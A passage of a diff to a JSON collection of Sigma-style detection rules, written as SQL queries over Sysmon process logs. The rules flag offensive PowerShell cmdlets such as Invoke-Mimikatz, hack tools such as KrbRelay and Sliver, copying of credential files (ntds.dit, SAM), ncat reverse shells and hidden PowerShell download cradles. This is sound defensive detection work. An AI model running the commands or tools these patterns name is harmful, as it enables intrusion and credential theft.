'%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", - "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Run Once Task Execution as Configured in Registry", - "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "This rule detects the execution of Run Once task as configured in the registry", - "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_runonce_execution.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "status": "test", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "File Deletion Via Del", + "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_cmd_del_execution.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.t1557.001" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.g0049", "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", + "attack.t1059", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be 